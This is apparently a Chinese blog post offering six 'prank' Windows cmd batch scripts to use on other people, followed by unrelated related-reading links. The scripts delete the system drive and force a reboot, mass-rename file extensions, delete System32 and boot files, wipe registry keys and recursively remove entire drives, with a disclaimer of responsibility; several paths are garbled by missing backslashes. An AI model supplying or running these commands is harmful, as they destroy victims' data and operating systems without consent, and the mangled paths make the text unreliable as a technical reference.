• 坑爹的cmd(整人专用)


    今天我特地上网搜集了六条条最危险的cmd命令,注意!

    如果你对其他人使用了这些cmd,本人概不负责。

    1.蓝屏死机

    @echo off

    del %systemdrive%*.*/f/s/q

    shutdown -f -r -t 00

    2.更改所有文件后缀名

    Ren *.doc *.txt Ren *.jpeg *.txt

    Ren *.lnk *.txt

    Ren *.avi *.txt

    Ren *.mpeg *.txt

    Ren *.com *.txt

    Ren *.bat *.txt

    3.删除system32

    Del c:windowssystem32*.* /q

    4.使PC永久崩溃

    @echo off

    Attrib -r -s -h c:autoexec.bat

    Del c:autoexec.bat

    Attrib -r -s -h c:oot.ini

    Del c:oot.ini

    Attrib -r -s -h c: tldr

    Del c: ntldr

    Attrib -r -s -h c:windowswin.ini

    Del c:windowswin.ini

    5.删除所有注册表

    @echo off

    start reg delete HKCR/.exe

    start reg delete HKCR/.dll

    start reg delete HKCR/*

    6.格式化硬盘

    rd/s/q D:

    rd/s/q C:

    rd/s/q E:

    再次声明,如果你使用这些命令造成了后果,本人一律不负责。

  • 相关阅读:
    bzoj3757 苹果树
    bzoj2743 [HEOI2012]采花
    bzoj4241 历史研究
    bzoj4448 [Scoi2015]情报传递
    bzoj3295 [Cqoi2011]动态逆序对
    bzoj4034 [HAOI2015]T2
    bzoj3339 Rmq Problem
    BZOJ 1017 魔兽地图
    BZOJ 1021 循环的债务
    SUOI #37 清点更多船只
  • 原文地址:https://www.cnblogs.com/cyk20081108/p/12938563.html
Copyright © 2020-2023  润新知